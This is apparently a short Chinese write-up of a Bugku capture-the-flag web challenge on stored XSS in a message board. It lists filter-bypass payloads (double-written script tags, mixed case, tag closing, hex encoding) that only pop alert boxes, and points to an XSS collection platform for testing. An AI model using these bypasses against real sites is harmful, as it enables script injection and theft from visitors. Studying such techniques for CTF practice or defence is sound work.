bugku-web-留言板1

大小写绕过也不行

<ScRipt>ALeRt("XSS");</sCRipT>

双写绕过可以

<scscriptript>alert('z')</scscriptript>

改变大小写

在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则:

比如:<script>alert("xss");</script>可以转换为:

<ScRipt>ALeRt("XSS");</sCRipT>

关闭标签

有时候我们需要关闭标签来使我们的XSS生效。

比如:"><script>alert("Hi");</script>

使用hex编码绕过

我们可以对我们的语句进行hex编码来绕过XSS规则

比如:<script>alert("xss");</script>可以转换为:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e

所以确定了过滤方式之后,找个xss平台(https://xssaq.com)测试一下:

相关推荐
网络安全-老纪14 分钟前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
API_technology17 分钟前
电商API安全防护:JWT令牌与XSS防御实战
前端·安全·xss
yqcoder22 分钟前
Express + MongoDB 实现在筛选时间段中用户名的模糊查询
java·前端·javascript
十八朵郁金香44 分钟前
通俗易懂的DOM1级标准介绍
开发语言·前端·javascript
GDAL2 小时前
HTML 中的 Canvas 样式设置全解
javascript
m0_528723812 小时前
HTML中,title和h1标签的区别是什么?
前端·html
Dark_programmer2 小时前
html - - - - - modal弹窗出现时,页面怎么能限制滚动
前端·html
GDAL2 小时前
HTML Canvas clip 深入全面讲解
前端·javascript·canvas
禾苗种树2 小时前
在 Vue 3 中使用 ECharts 制作多 Y 轴折线图时,若希望 **Y 轴颜色自动匹配折线颜色**且无需手动干预,可以通过以下步骤实现:
前端·vue.js·echarts
GISer_Jing2 小时前
Javascript排序算法(冒泡排序、快速排序、选择排序、堆排序、插入排序、希尔排序)详解
javascript·算法·排序算法